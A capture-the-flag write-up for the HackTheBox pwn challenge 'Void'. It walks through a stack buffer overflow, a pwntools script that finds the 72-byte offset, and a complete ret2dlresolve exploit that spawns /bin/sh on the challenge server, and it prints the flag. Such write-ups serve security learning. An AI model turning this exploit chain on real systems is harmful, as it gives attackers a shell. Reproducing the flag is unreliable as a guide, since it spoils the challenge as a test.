Pwn - Void
Medium
Description
The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Downloads
Solution
checksec outputThe binary is very simple with a vuln() function that has a clear stack buffer overflow.
Looking at the GOT, there is only read available.
With no win function anywhere
No method like
putsto leak a libc addressRelatively big space to hold a payload (
read(0, buf, 200))
It suggest that we'll need to do a Ret2dlresolve ROP chain.
Firstly, the code to find the padding needed to control rip.
from pwn import *
binary = context.binary = ELF("./void")
p = process(binary.path)
p.sendline(cyclic(1024, n=8))
p.wait()
core = p.corefile
p.close
os.remove(core.file.name)
padding = cyclic_find(core.read(core.rsp, 8), n=8)
log.info('Padding: ' + str(padding) + " (" + hex(padding) + ")")We find the padding needed to be 72 bytes. We then, proceed with creating the dlresolve ROP chain using pwntools. While the concept is not so straight-forward, the exploit is very easily written with pwntools. The entire exploit code is as simple as such:
from pwn import *
binary = context.binary = ELF("./void")
rop = ROP(binary)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])
rop.raw('A' * 72)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
# send payload
p = remote("178.62.64.13", 30663)
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()Flag: HTB{r3s0lv3_th3_d4rkn355}
Last updated